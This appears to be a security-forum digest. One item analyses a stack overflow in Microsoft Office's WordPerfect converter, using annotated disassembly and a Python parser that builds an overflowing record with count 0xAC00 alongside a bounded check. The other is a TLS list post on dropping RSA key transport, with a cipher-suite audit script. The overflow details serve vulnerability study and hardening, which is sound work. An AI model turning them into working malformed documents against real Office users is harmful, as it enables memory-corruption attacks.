.text:014D89A4 push ebp
.text:014D89A5 mov ebp, esp
.text:014D89A7 push ebx
.text:014D89A8 push esi
.text:014D89A9 mov esi, eax ;esi=eax=0x20 counter 0x20
.text:014D89AB imul eax, 14h ;eax=20h*14h=280
.text:014D89AE imul esi, 35h ;esi=0x20*0x35=0x6a0 maximum sizeof(CSTYL)*32
.text:014D89B1 add esi, [ebp+arg_0] ;esi=6a0+0018 f200=0018 f8a0
.text:014D89B4 add eax, offset word_14E4567 ;eax=280+offset WPFT532!AbortRtfToForeign+0x12684=6a52 47e7
.text:014D89B9 push edi ;edi=20
.text:014D89BA mov [ebp+arg_0], eax ;[ebp+8]=[0018 f1e8]=6a52 47e7
.text:014D89BD mov eax, [ebp+arg_4] ;eax=[ebp+0ch]= [0018 f1ec]=00
.text:014D89C0 xor ebx, ebx ;ebx=0
.text:014D89C2 push ebx
.text:014D89C3 and eax, 7 ;eax=0
.text:014D89C6 push ebx ;ebx=0
.text:014D89C7 push eax ;eax=0
.text:014D89C8 lea eax, [esi+0Ch] ;eax=0018 f8ac, [esi+0ch]=[0018 f8ac]=0000 0000
.text:014D89CB push eax ;eax=0018 f8ac
.text:014D89CC call sub_14D19F6 ;ebp no overwrite
.text:014D89D1 mov eax, [ebp+arg_4] ;eax=[ebp+0ch]=[0018 f1ec]=0
.text:014D89D4 push ebx ;ebx=0
.text:014D89D5 shr eax, 3 ;eax=0
.text:014D89D8 push ebx ;ebx=0
.text:014D89D9 and eax, 7 ;eax=0
.text:014D89DC push eax
.text:014D89DD push esi ;esi=0018 f8a0
.text:014D89DE call sub_14D19F6 ;ebp no overwrite
.text:014D89E3 mov eax, [ebp+arg_4] ;eax=[ebp+0ch]=[0018 f1ec]=0
.text:014D89E6 push ebx ;ebx=0
.text:014D89E7 shr eax, 8 ;eax=0
.text:014D89EA push ebx ;ebx=0
.text:014D89EB and eax, 7 ;eax=0
.text:014D89EE push eax
.text:014D89EF lea edi, [esi+24h] ;edi=0018 f8a0+24h=0018 f8c4, [esi+24h]=[0018f8a0+24h]=6a5082a7
.text:014D89F2 push edi ;edi=20
.text:014D89F3 call sub_14D19F6 ;overwrite ebp in this routine

The figure below shows the overwrite of the Stack Base Pointer Register (EBP 0x0018f8b8) in function 'sub_14D19F6', which caused the memory corruption.

Figure 6: EBP Before Overwrite
Figure 7: EBP After Overwrite

The result of the EBP overwrite will cause Microsoft Office to crash when returning to the previous block of code.

Figure 8: Microsoft Office Crash

Reference:
1. WP6 File Format SDK [Download]

Sursa: F13 Laboratory
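The root cause in the listing is a mask where a bound was needed: 'and eax, 7FFFh' strips bit 15 from the element count and leaves 0xAC00 & 0x7FFF = 0x2C00 iterations against a destination sized for 32 entries of 0x35 bytes (0x6a0). The following is an added example, not F13's code: a small parser for the multi-byte function layout described in the post (open gate, subgroup byte, 16-bit size, flags byte, body, trailing size word, closing gate) that derives the CSTYL count the way the converter does and the way a safe converter should. It assumes that the size word covers the whole function including both gates, that no prefix-ID data is present, and that the count is the first word of the body; the record encoder and the sample values are constructed for the example.

```python
import struct

# Added example, not F13's code: a minimal parser for the WP5.x multi-byte
# function layout described above, with the CSTYL element count taken both the
# way the disassembly does ('and eax, 7FFFh', i.e. only the top bit stripped)
# and the way a safe converter should (bounded by the fixed-size destination).
# Assumptions: the 16-bit size covers the whole function including both gates,
# no prefix-ID data is present, and the element count is the first body word.

OPEN_GATE_MIN, OPEN_GATE_MAX = 0xD0, 0xEF
CSTYL_SIZE = 0x35            # from 'imul esi, 35h' in the listing
MAX_CSTYL = 32               # the stack buffer holds sizeof(CSTYL) * 32 = 0x6a0 bytes
BUFFER_BYTES = CSTYL_SIZE * MAX_CSTYL


def build_function(count, code=0xDC, subgroup=0x00, flags=0x00):
    """Constructed encoder for one multi-byte function carrying a count word."""
    body = struct.pack("<H", count)
    size = 1 + 1 + 2 + 1 + len(body) + 2 + 1   # gate, subgroup, size, flags, body, size, gate
    return (bytes([code, subgroup]) + struct.pack("<H", size) + bytes([flags])
            + body + struct.pack("<H", size) + bytes([code]))


def parse_function(buf):
    """Return (code, subgroup, flags, body), checking both gates and both size words."""
    code = buf[0]
    if not OPEN_GATE_MIN <= code <= OPEN_GATE_MAX:
        raise ValueError("not a variable-length multi-byte function")
    size, = struct.unpack_from("<H", buf, 2)
    if size < 8 or size > len(buf):
        raise ValueError("size word out of range")
    if buf[size - 1] != code:
        raise ValueError("closing gate does not match open gate")
    tail, = struct.unpack_from("<H", buf, size - 3)
    if tail != size:
        raise ValueError("leading and trailing size words disagree")
    return code, buf[1], buf[4], buf[5:size - 3]


def cstyl_count_as_converted(body):
    """What the converter computes: the raw word with only bit 15 cleared."""
    raw, = struct.unpack_from("<H", body, 0)
    return raw & 0x7FFF


def cstyl_count_checked(body):
    """Hardened variant: refuse counts the fixed-size destination cannot hold."""
    count = cstyl_count_as_converted(body)
    if count > MAX_CSTYL:
        raise ValueError("CSTYL count 0x%x exceeds %d-entry buffer" % (count, MAX_CSTYL))
    return count


def overflow_bytes(count):
    """Bytes the converter's copy loop would write past the 0x6a0-byte buffer."""
    return max(0, count * CSTYL_SIZE - BUFFER_BYTES)


if __name__ == "__main__":
    for raw in (0x0005, 0xAC00):
        body = parse_function(build_function(raw))[3]
        n = cstyl_count_as_converted(body)
        print("raw=0x%04x masked=0x%04x overflow=%d bytes" % (raw, n, overflow_bytes(n)))
        try:
            cstyl_count_checked(body)
        except ValueError as e:
            print("  rejected:", e)
```

The mask only guarantees the count is below 0x8000, which says nothing about the 32-entry buffer; the checked variant compares against the destination's real capacity, which is the check that was missing at 'loc_14D9336'.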
-
[h=1][TLS] Confirming Consensus on removing RSA key Transport from TLS 1.3[/h]

The discussion on this list and others supports the consensus in IETF 89 to remove RSA key transport cipher suites from TLS 1.3. The Editor is requested to make the appropriate changes to the draft on github. More discussion is needed on how both DH and ECDH are used going forward and on whether standard DHE parameters will be specified.

Joe
[For the chairs]

On Mar 26, 2014, at 11:43 AM, Joseph Salowey (jsalowey) <jsalowey at cisco.com> wrote:

> TLS has had cipher suites based on RSA key transport (aka "static RSA", TLS_RSA_WITH_*) since the days of SSL 2.0. These cipher suites have several drawbacks including lack of PFS, pre-master secret contributed only by the client, and the general weakening of RSA over time. It would make the security analysis simpler to remove this option from TLS 1.3. RSA certificates would still be allowed, but the key establishment would be via DHE or ECDHE. The consensus in the room at IETF-89 was to remove RSA key transport from TLS 1.3. If you have concerns about this decision please respond on the TLS list by April 11, 2014.
>
> Thanks,
>
> Joe
> [Speaking for the TLS chairs]
> _______________________________________________
> TLS mailing list
> TLS at ietf.org
> https://www.ietf.org/mailman/listinfo/tls

Sursa: Re: [TLS] Confirming Consensus on removing RSA key Transport from TLS 1.3
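The suites the thread proposes to drop are easy to spot by name, and the same check is useful on any server or client configuration today. The following is an added example, not something from the TLS list thread: it classifies cipher suites by key-exchange method, handling IANA names (TLS_RSA_WITH_... is the RSA key transport family, TLS_DHE_/TLS_ECDHE_ the forward-secret ones) and OpenSSL-style names (where an absent key-exchange prefix, as in AES128-SHA, means RSA key transport), and reports everything that lacks forward secrecy. The sample configuration is constructed.

```python
# Added example (not from the TLS list thread): classify cipher suites by key
# exchange so that the RSA key transport suites the thread proposes to drop can
# be found in a configuration. Handles IANA names (TLS_RSA_WITH_...) and the
# OpenSSL-style names used in server cipher strings; the sample list is made up.

NO_PFS = {"rsa-key-transport", "static-dh"}


def key_exchange(suite):
    """Return one of: rsa-key-transport, static-dh, ephemeral, tls13, other."""
    s = suite.upper()
    if s.startswith(("TLS_AES_", "TLS_CHACHA20_")):
        return "tls13"                     # TLS 1.3: (EC)DHE is negotiated separately
    if s.startswith("TLS_") and "_WITH_" in s:
        kx = s[4:].split("_WITH_", 1)[0]   # IANA name: TLS_<kx>_WITH_<cipher>_<mac>
        if "ANON" in kx:
            return "other"                 # anonymous DH: no PFS question, no auth at all
        if kx in ("RSA", "RSA_PSK"):
            return "rsa-key-transport"     # pre-master secret encrypted to the server's RSA key
        if kx.startswith(("DHE_", "ECDHE_")):
            return "ephemeral"
        if kx.startswith(("DH_", "ECDH_")):
            return "static-dh"
        return "other"                     # PSK, SRP, NULL, ...
    # OpenSSL-style names: the key-exchange prefix is optional and RSA is the default.
    if s.startswith(("ECDHE-", "DHE-", "EDH-")):
        return "ephemeral"
    if s.startswith(("ECDH-", "DH-")):
        return "static-dh"
    if s.startswith(("PSK-", "SRP-", "ADH-", "AECDH-", "NULL-")):
        return "other"
    return "rsa-key-transport"             # e.g. AES128-GCM-SHA256


def audit(suites):
    """Map each suite lacking forward secrecy to its key-exchange class."""
    return {s: key_exchange(s) for s in suites if key_exchange(s) in NO_PFS}


# Constructed sample of a mixed configuration.
SAMPLE_CONFIG = [
    "TLS_RSA_WITH_AES_128_CBC_SHA",
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_DH_RSA_WITH_AES_256_CBC_SHA",
    "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384",
    "TLS_AES_256_GCM_SHA384",
    "AES256-SHA",
    "ECDHE-ECDSA-CHACHA20-POLY1305",
]

if __name__ == "__main__":
    for suite, kx in audit(SAMPLE_CONFIG).items():
        print("no forward secrecy:", suite, "(%s)" % kx)
```

Static (EC)DH suites are reported alongside RSA key transport because they share the property the thread objects to: a single long-term server key decrypts every past session once it is compromised.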